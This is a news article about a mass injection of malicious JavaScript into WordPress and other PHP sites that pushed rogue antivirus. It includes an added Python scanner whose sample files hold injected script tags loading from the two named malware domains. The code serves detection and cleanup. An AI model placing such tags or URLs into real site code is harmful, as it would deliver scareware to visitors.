Widespread attacks continue against WordPress sites

Powered by SC Magazine

Other sites now targeted as well.

A new campaign to hack WordPress websites and serve rogue anti-virus is underway, according to security researchers.

In addition to WordPress blogs, websites created with other PHP-based platforms, including the Zen Cart eCommerce solution, are affected by the attacks, Regina Smola, co-founder of WPSecurityLock, told SCMagazineUS.com.

Attackers injected malicious JavaScript into the sites, causing visitors to be redirected to scareware domains that attempted to trick users into installing a virus, she said.

Tens of thousands of legitimate sites are believed to be affected.

When visiting one of the compromised sites, users of Internet Explorer or Chrome were redirected to the rogue AV, Smola said. Firefox users were not affected.

Having an up-to-date anti-virus program would block the scareware program from running, she said.

David Dede, lead security researcher at malware detection solutions provider Sucuri Security, told SCMagazineUS.com that all PHP files on affected sites were modified. The malicious JavaScript loaded rogue anti-virus malware from two domains in this case: indesignstudioinfo.com/ls.php and zettapetta.com/js.php.

“The pain to the users is that every single file got infected,” Dede said. “On a normal WordPress site, it is around 1,000 files to clean.”
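The file-level sweep Dede describes, written here as an added illustration rather than Sucuri's or WPSecurityLock's own cleanup script: it walks a site tree and reports every PHP file carrying a remote script tag that loads from either domain named above. The exact shape of the injected tag and the three sample files are assumptions, since the article names only the domains.

```python
import os
import re
import tempfile

# The two domains the article names as the source of the rogue anti-virus payload.
INDICATOR_DOMAINS = ("indesignstudioinfo.com/ls.php", "zettapetta.com/js.php")

# Remote <script src=...> tag; the exact tag shape is an assumption, the
# article only names the domains the injected JavaScript loaded from.
SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']?(https?://[^"\'>\s]+)', re.I)

def find_injections(php_source):
    """Return the remote script URLs in php_source that point at an indicator domain."""
    return [url for url in SCRIPT_SRC.findall(php_source)
            if any(d in url for d in INDICATOR_DOMAINS)]

def scan_tree(root):
    """Map each .php file under root (slash-separated relative path) to its indicator URLs."""
    infected = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injections(fh.read())
            if hits:
                infected[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return infected

# Constructed sample tree: two files carrying an injected tag, one clean.
SAMPLE_FILES = {
    "index.php": "<?php /* clean */ ?>\n",
    "wp-config.php": "<?php define('DB_NAME', 'wp'); ?>\n"
                     '<script src="http://indesignstudioinfo.com/ls.php"></script>\n',
    "wp-content/themes/default/footer.php":
        "</div>\n<script src='http://zettapetta.com/js.php'></script>\n",
}

def demo():
    """Write the constructed sample into a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for path, urls in sorted(demo().items()):
        print(path, "->", ", ".join(urls))
```

Run against a real site root (`scan_tree("/path/to/site")`) the result is the list of files to restore from a known-good copy; a count in the high hundreds on a WordPress install matches the "around 1,000 files" figure Dede gives.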

The affected sites were hosted by a number of US-based ISPs, including DreamHost, GoDaddy, Bluehost, Media Temple and HostGator, the researchers said. Since all the hacked sites were utilising shared web hosting providers, analysts did not have access to system logs and were not able to conduct a full forensic investigation.

As a result, experts are unsure how the sites were compromised. Attackers may have used stolen FTP or WordPress passwords, launched a brute-force attack against the passwords, or leveraged a vulnerability in either WordPress itself or a WordPress plug-in, Dede wrote in a blog post.

Todd Redfoot, CISO of GoDaddy, said in a statement sent to WPSecurityLock that the attack was targeting websites running outdated versions of WordPress and other online applications. However, a number of sites running the latest version of WordPress also had been compromised, Dede said.

It does not appear that attackers took advantage of an unknown vulnerability in WordPress because, if so, the exploits would be more widespread, he added.

Smola said a brute-force attack against passwords is possible.

“I have found that 99 percent of the sites that we have seen and fixed had very weak passwords to both their FTP and their hosting accounts,” she said.

Others have speculated that the attack may have leveraged a zero-day vulnerability in phpMyAdmin, an open-source tool that allows users to interact with their MySQL databases, Dede said. But there is no evidence of this.

WPSecurityLock has posted instructions for removing the infection, and Sucuri Security has released scripts to automate the process.

This is just the latest wave of attacks against WordPress websites that have been ongoing for the past month, Smola said.

In a previous attack, launched earlier this month, more than 40,000 WordPress sites were affected, she said.

And in April, reports surfaced that some WordPress sites had been compromised to direct users to malicious websites. In that case, the targeted sites appeared to be hosted by Network Solutions. WordPress creator Matt Mullenweg subsequently pinned the blame on improperly configured web servers, which he said are the responsibility of the hosting provider.

"WordPress, like all other web applications, must store database connection info in clear text," Mullenweg said. "Encrypting credentials doesn't matter because the keys have to be stored where the web server can read them in order to decrypt the data. If a malicious user has access to the file system — like they appeared to have in this case — it is trivial to obtain the keys and decrypt the information. When you leave the keys to the door in the lock, does it help to lock the door?"

Network Solutions representatives disagreed.

"This issue is not isolated to Network Solutions, nor is it a Network Solutions server issue," a spokeswoman told SCMagazineUS.com in an email. "We're working with the experts in the WordPress community and understand it is an issue with a WordPress plug-in or theme and it is impacting a number of websites that are hosted on various hosting platforms."

The latest spate of WordPress attacks may be linked to recently compromised websites belonging to the U.S. Department of Treasury that were attempting to exploit client-side vulnerabilities to serve malware, independent analyst Dancho Danchev said in a blog post.

"The hosting company used by the [Treasury Department's] Bureau of Engraving and Printing had an intrusion, and as a result of that intrusion, numerous websites were affected," he said in a statement emailed to SCMagazineUS.com.

The Treasury Department did not name the hosting provider in the statement, but researchers said it was Network Solutions.

See original article on scmagazineus.com

Copyright © SC Magazine, US edition
